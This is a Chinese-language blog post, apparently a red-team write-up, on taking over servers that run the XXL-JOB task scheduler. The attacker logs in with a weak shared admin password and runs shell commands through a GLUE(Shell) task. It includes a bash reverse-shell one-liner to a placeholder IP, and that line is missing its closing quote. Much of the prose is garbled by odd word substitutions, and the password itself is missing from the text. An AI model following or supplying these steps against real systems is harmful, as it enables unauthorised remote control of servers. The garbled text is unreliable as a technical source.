XXL-JOB分布式任务调度平台利用步骤利用通用弱口令登录admin

写在上面

明天早上红队外网刚遇见的漏洞,xxl-job本身是由默认弱口令admin/,这个系统改过密码是其他途径领到的通用口令。觉得漏洞性质跟登陆后台之后RCE性质差不多任务平台,有点跳票了,记录一下步骤。

目录

0x01 漏洞原理0x02 影响版本0x03 利用步骤0x04 参考

漏洞原理

XXL-JOB分布式任务调度平台是一个轻量级分布式任务调度平台,使用JAVA语言研制,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国外颇受欢迎任务平台,目前已有多家公司接入xxl-job。

获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。

影响版本

所有已知版本

借助步骤

借助通用弱口令登陆admin/

在任务管理栏目点击新增任务

如图配置,选择GLUE(Shell),完成后保存

完成后点击GLUEIDE

步入编辑界面,输入须要执行的命令

编辑结束后点击执行一次,在点击调度日志查看执行结果

点击执行日志查看结果

成功执行指令

可以将这儿的更改为大跌shell实现控制服务器,其他步骤同上

bash -c 'exec bash -i >& /dev/tcp/10.10.10.10/8088 <&1

参考

https://www.jianshu.com/p/dfeb7f9692c6

写在最后

本人坚决反对借助文章内容进行恶意功击行为,一切错误行为终将遭到惩罚,红色网路须要靠我们共同维护,推荐你们在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

未经授权切勿借助文章中的技术资料对任何计算机系统进行入侵操作。借助此文所提供的信息而导致的直接或间接后果和损失,均由使用者本人负责。

标签: 调度 口令 漏洞 日志 后台

  • 评论列表 (0)

留言评论